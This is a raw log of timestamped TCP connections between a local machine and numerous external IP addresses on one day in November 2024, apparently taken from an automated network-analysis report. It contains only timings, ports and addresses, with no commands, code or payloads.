                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.867402077 CET805464685.17.31.122192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.867465973 CET5464680192.168.2.685.17.31.122
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.867609978 CET5464680192.168.2.685.17.31.122
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.872821093 CET805464685.17.31.122192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.874737024 CET54647443192.168.2.675.2.71.199
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.874777079 CET4435464775.2.71.199192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.874861956 CET54647443192.168.2.675.2.71.199
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.875125885 CET54647443192.168.2.675.2.71.199
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.875139952 CET4435464775.2.71.199192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.885054111 CET5464880192.168.2.623.253.46.64
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.889939070 CET805464823.253.46.64192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.890000105 CET5464880192.168.2.623.253.46.64
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.890130043 CET5464880192.168.2.623.253.46.64
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.895060062 CET805464823.253.46.64192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:49.127126932 CET8049728154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:49.127177000 CET4972880192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:50:49.130069017 CET44354645188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:49.130145073 CET54645443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:49.132064104 CET54645443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.692908049 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.692969084 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.693022966 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.693939924 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.693955898 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.897447109 CET800049759106.15.232.163192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.897504091 CET497598000192.168.2.6106.15.232.163
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.898982048 CET4975380192.168.2.6103.150.10.48
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.907111883 CET8049753103.150.10.48192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:53.144182920 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:53.144277096 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:53.146549940 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:53.146564007 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:53.146806002 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:53.146857023 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:53.147165060 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:53.191329956 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:53.193872929 CET8049753103.150.10.48192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:53.193924904 CET4975380192.168.2.6103.150.10.48
                                                                                                                                                                                                                  Nov 11, 2024 18:50:53.195024967 CET497598000192.168.2.6106.15.232.163
                                                                                                                                                                                                                  Nov 11, 2024 18:50:53.199928045 CET800049759106.15.232.163192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:53.461175919 CET800049759106.15.232.163192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:53.461299896 CET497598000192.168.2.6106.15.232.163
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.724766016 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.725089073 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.725117922 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.725179911 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.725197077 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.725208998 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.725225925 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.725265026 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.725271940 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.725315094 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.725461006 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.725512028 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.725517988 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.725559950 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.725825071 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.725858927 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.725863934 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.725899935 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.759597063 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.759664059 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.759799957 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.759821892 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.759824991 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.760097980 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.863095045 CET4974080192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.867969036 CET8049740188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.237633944 CET8049740188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.237760067 CET4974080192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.247191906 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.247236967 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.247297049 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.247584105 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.247601986 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.680782080 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.680845976 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.682807922 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.682812929 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.683070898 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.683125019 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.683515072 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.731329918 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.118488073 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.118532896 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.118537903 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.118571043 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.118612051 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.118612051 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.119132996 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.119177103 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.119183064 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.119225025 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.119909048 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.119951963 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.119956017 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.119961977 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.119981050 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.120009899 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.121093988 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.121133089 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.121140003 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.121181965 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.121973038 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.122024059 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.122189045 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.122226954 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.122265100 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.150166035 CET5472480192.168.2.6103.224.212.210
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.158094883 CET8054724103.224.212.210192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.158163071 CET5472480192.168.2.6103.224.212.210
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.165591002 CET5472480192.168.2.6103.224.212.210
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.172884941 CET8054724103.224.212.210192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.237823963 CET5472580192.168.2.6103.224.182.252
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.246038914 CET8054725103.224.182.252192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.246093035 CET5472580192.168.2.6103.224.182.252
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.251365900 CET5472580192.168.2.6103.224.182.252
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.258730888 CET8054725103.224.182.252192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.263794899 CET4979680192.168.2.6154.85.183.50
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.653220892 CET5377480192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.657032967 CET52120443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.657063961 CET4435212099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.657747984 CET52120443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.659411907 CET805377444.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.659550905 CET5377480192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.661029100 CET5377480192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.666484118 CET805377444.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.670015097 CET5212180192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.670021057 CET5212280192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.670552969 CET5212380192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.674902916 CET805212144.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.674913883 CET8052122199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.675009012 CET5212180192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.675071955 CET5212280192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.675200939 CET5212480192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.675390959 CET8052123208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.675772905 CET5212380192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.676589012 CET5212280192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.676775932 CET5212380192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.676995039 CET5212180192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.679945946 CET8052124162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.680696964 CET5212480192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.680701017 CET5212580192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.681401014 CET8052122199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.681536913 CET8052123208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.681833982 CET805212144.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.685029030 CET5212680192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.685753107 CET8052125178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.686229944 CET8053772162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.687438011 CET5212480192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.687438011 CET5377280192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.687442064 CET5212580192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.687581062 CET5212580192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.690100908 CET8052126188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.691116095 CET5212680192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.691417933 CET5212680192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.692812920 CET8052124162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.692843914 CET8052125178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.696727991 CET8052126188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.699528933 CET52120443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.699561119 CET4435212099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.724939108 CET5212780192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.729906082 CET8052127178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.733166933 CET5212780192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.754053116 CET5212880192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.759136915 CET8052128188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.759383917 CET5212880192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.787517071 CET5212880192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.792390108 CET8052128188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.817025900 CET5212980192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.821933031 CET805212918.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.822252989 CET5212980192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.822654963 CET5212980192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.827889919 CET805212918.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.851334095 CET8053777199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.851399899 CET8053777199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.851433992 CET5377780192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.851632118 CET5377780192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.871604919 CET8053776208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.871819973 CET5377680192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.036108971 CET5213280192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.037019968 CET5213380192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.041081905 CET8052132178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.041887999 CET8052133199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.042418957 CET5213380192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.042427063 CET5213280192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.045324087 CET5213380192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.050333977 CET8052133199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.076699018 CET80521193.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.077020884 CET5211980192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.122396946 CET8052122199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.122451067 CET8052122199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.122596025 CET805212144.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.122626066 CET5212280192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.122914076 CET5212180192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.123620033 CET80521193.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.123730898 CET5211980192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.128988981 CET8052123208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.129381895 CET5212380192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.131521940 CET8052125178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.131679058 CET805212144.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.131695986 CET5212580192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.131784916 CET5212180192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.138339043 CET4435212099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.138484001 CET52120443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.150044918 CET8052127178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.150134087 CET5212780192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.214816093 CET8052124162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.215054989 CET5212480192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.250683069 CET805212918.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.250811100 CET5212980192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.257227898 CET805212918.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.261482000 CET5212980192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.387069941 CET8052126188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.387343884 CET5212680192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.459768057 CET8052132178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.459856033 CET5213280192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.467180967 CET5213580192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.472173929 CET8052135208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.036847115 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.036928892 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.062491894 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.062494040 CET5021580192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.063113928 CET5021880192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.063142061 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.067388058 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.067399025 CET8050215154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.067426920 CET5212580192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.067495108 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.067936897 CET805021844.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.067970037 CET5021580192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.067976952 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.067998886 CET5021880192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.068192005 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.068192005 CET5021780192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.068675041 CET5021580192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.068676949 CET5021680192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.068933964 CET5021880192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.072257042 CET8052125178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.072308064 CET5212980192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.073546886 CET8050217199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.073570013 CET8050215154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.073580980 CET805021691.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.073693991 CET805021844.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.077194929 CET805212918.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.079880953 CET5211980192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.085056067 CET80521193.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.121963024 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122101068 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122121096 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122133017 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122186899 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122494936 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122507095 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122586966 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122843027 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122854948 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122870922 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122891903 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.122946024 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.123346090 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.123357058 CET805217091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.123575926 CET5217080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.156930923 CET5021980192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.158371925 CET5377780192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.158371925 CET5377780192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.163120985 CET8050219178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.165069103 CET5021980192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.176939011 CET50220443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.176985979 CET44350220188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.178250074 CET5377680192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.178325891 CET50220443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.183110952 CET8053776208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.212680101 CET4435021099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.212945938 CET50210443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.223047018 CET5021980192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.227824926 CET8050219178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.236927986 CET50220443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.236941099 CET44350220188.114.96.3192.168.2.6
